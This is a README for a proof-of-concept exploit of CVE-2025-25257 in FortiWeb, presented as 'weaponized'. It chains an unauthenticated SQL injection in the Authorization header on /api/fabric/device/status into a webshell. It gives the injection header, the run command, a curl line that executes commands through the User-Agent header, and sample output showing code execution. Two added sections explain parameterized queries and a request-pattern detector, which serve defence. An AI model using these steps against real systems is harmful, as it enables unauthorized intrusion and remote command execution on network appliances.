PoC for CVE-2025-25257, a critical unauthenticated SQL injection in FortiWeb. Exploits SQLi via the Authorization header to write a webshell and gain RCE. No login required. Fully automated.

<p align="center">
<img src="sample.png" width="400" />
</p>

<h1 align="center">🚨 CVE-2025-25257 – FortiWeb SQLi to RCE</h1>
<p align="center"><b>Critical SQL Injection → Webshell Execution</b></p>
<p align="center"><code>Discovered and weaponized by 0xgh057r3c0n</code></p>

---
## 🧠 Vulnerability Overview
`CVE-2025-25257` affects FortiWeb systems exposing the endpoint `/api/fabric/device/status`, which fails to properly sanitize `Authorization` header input.
> An attacker can perform unauthenticated SQL injection to write a webshell on the server and execute commands remotely.
---
## 💥 Attack Flow
```text
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
```
---
## 📍 Vulnerable Endpoint
```http
GET /api/fabric/device/status
Authorization: Bearer ';<SQLi>
```
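To make the bug class concrete, here is an added model of the flaw, written for this README and not taken from FortiWeb or from the PoC: a credential lifted from the `Authorization` header is spliced into SQL as a string, next to the parameterized lookup that closes the hole. The table, column names and token values are assumptions; only the "Bearer token goes into a query" shape comes from the advisory text above. It uses an in-memory SQLite database so it runs offline.

```python
"""Model of the CVE-2025-25257 bug class: a Bearer token concatenated into SQL.

Added example, not FortiWeb's code. The schema and tokens are assumptions.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed token table standing in for whatever the real endpoint queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_tokens (token TEXT PRIMARY KEY, device TEXT)")
    conn.execute("INSERT INTO api_tokens VALUES ('abc123', 'fabric-node-1')")
    conn.commit()
    return conn


def parse_bearer(header: str) -> str:
    """Return the credential part of 'Authorization: Bearer <token>'."""
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "bearer":
        raise ValueError("not a Bearer credential")
    return token.strip()


def lookup_vulnerable(conn: sqlite3.Connection, header: str) -> Optional[str]:
    """String-built query: the header value becomes part of the SQL grammar."""
    token = parse_bearer(header)
    sql = f"SELECT device FROM api_tokens WHERE token = '{token}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(conn: sqlite3.Connection, header: str) -> Optional[str]:
    """Parameterized query: the header value is only ever data, never grammar."""
    token = parse_bearer(header)
    row = conn.execute(
        "SELECT device FROM api_tokens WHERE token = ?", (token,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    # A quote in the credential changes the query for the string-built version
    # and is just a non-matching literal for the parameterized one.
    for header in ("Bearer abc123", "Bearer ' OR '1'='1"):
        print(repr(header),
              "vulnerable ->", lookup_vulnerable(make_db(), header),
              "| hardened ->", lookup_hardened(make_db(), header))
```

The point for the mitigation list later in this README: "sanitizing" header input by hand is a fragile second line of defence; binding the value as a query parameter removes the SQL grammar boundary problem entirely.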
---
## 🔓 Exploit Features
* SQLi via Bearer token
* SQL `INTO OUTFILE` to drop shell
* Python hook triggers chmod
* Commands executed via User-Agent
* Fully automated PoC
---
## 🧪 Usage
```bash
python3 CVE-2025-25257.py -t https://target-host.com
```
Then:
```bash
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
```
---
## 🔧 Requirements
* Python 3.6+
* `requests` module
Install:
```bash
pip install requests
```
---
## 📤 Sample Output
```text
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
```
---
## 📊 CVSS Estimate
| Metric | Value |
| ------------------- | -------------- |
| Base Score | 9.8 (CRITICAL) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Impact | High (C/I/A) |
---
## 🛡️ Mitigation
* Update FortiWeb firmware (if patch available)
* Sanitize all header inputs
* Restrict file write paths and CGI execution
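For teams that cannot patch immediately, the request shapes this README documents give two things to hunt for in reverse-proxy or WAF captures: a non-token value in the `Bearer` credential sent to `/api/fabric/device/status`, and command-like `User-Agent` strings sent to a `/cgi-bin/` path. The following detector is an added example, not part of the PoC or of any Fortinet tooling. It assumes legitimate bearer tokens fit the RFC 6750 `b64token` character set and that real client User-Agents contain at least one `product/version` token; both are heuristics, and the sample requests are constructed.

```python
"""Detect the CVE-2025-25257 request patterns in captured HTTP requests.

Added example, not part of the PoC. Token charset and User-Agent rules are
assumptions; tune them to what your FortiWeb deployment actually sees.
"""
import re
from typing import Dict, List, Tuple

VULN_PATH = "/api/fabric/device/status"

# RFC 6750 b64token: 1*( ALPHA / DIGIT / "-" / "." / "_" / "~" / "+" / "/" ) *"="
# Assumption: a valid token never contains quotes, semicolons or spaces.
B64TOKEN_RE = re.compile(r"[A-Za-z0-9\-._~+/]+=*")

# Heuristic: a real client UA has at least one "product/version" token.
UA_PRODUCT_RE = re.compile(r"\S+/\S+")
# Shell chaining sequences that browser UAs do not contain (";" and "()" do appear).
SHELL_CHAIN = ("|", "`", "$(", "&&", "||")


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, target, lowercased headers)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln]
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def bearer_is_wellformed(value: str) -> bool:
    """True only for 'Bearer <b64token>'."""
    scheme, _, token = value.strip().partition(" ")
    return scheme.lower() == "bearer" and B64TOKEN_RE.fullmatch(token.strip()) is not None


def user_agent_looks_like_command(ua: str) -> bool:
    """Flag empty UAs, shell chaining, or UAs with no product/version token."""
    if not ua:
        return True
    if any(seq in ua for seq in SHELL_CHAIN):
        return True
    return UA_PRODUCT_RE.search(ua) is None


def classify_request(raw: str) -> List[str]:
    """Return a list of indicator names matched by one captured request."""
    _method, target, headers = parse_request(raw)
    path = target.split("?", 1)[0]
    findings: List[str] = []
    auth = headers.get("authorization")
    if path == VULN_PATH and auth is not None and not bearer_is_wellformed(auth):
        findings.append("malformed-bearer-on-fabric-status")
    if path.startswith("/cgi-bin/") and user_agent_looks_like_command(
        headers.get("user-agent", "")
    ):
        findings.append("command-like-user-agent-to-cgi")
    return findings


# Constructed sample requests (not real traffic).
SAMPLE_BENIGN = (
    "GET /api/fabric/device/status HTTP/1.1\r\nHost: fw.example\r\n"
    "Authorization: Bearer abc.DEF-123_~+/==\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"
)
SAMPLE_BAD_TOKEN = (
    "GET /api/fabric/device/status HTTP/1.1\r\nHost: fw.example\r\n"
    "Authorization: Bearer ';x\r\n\r\n"
)
SAMPLE_CGI = "GET /cgi-bin/x.cgi HTTP/1.1\r\nHost: fw.example\r\nUser-Agent: whoami\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("benign", SAMPLE_BENIGN), ("bad-token", SAMPLE_BAD_TOKEN), ("cgi", SAMPLE_CGI)):
        print(f"{name:10s} -> {classify_request(raw) or 'no findings'}")
```

Feed it the request heads your proxy or WAF already logs; the Bearer rule in particular is cheap enough to run inline as a reject-before-query check, which is the practical form of "sanitize all header inputs" above.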
---
## 👨‍💻 Author
**0xgh057r3c0n**
🔗 [github.com/0xgh057r3c0n](https://github.com/0xgh057r3c0n)
---
## ⚠️ Disclaimer
This proof-of-concept is for **educational and authorized testing** only.
Use at your own risk. The author is not responsible for misuse.
---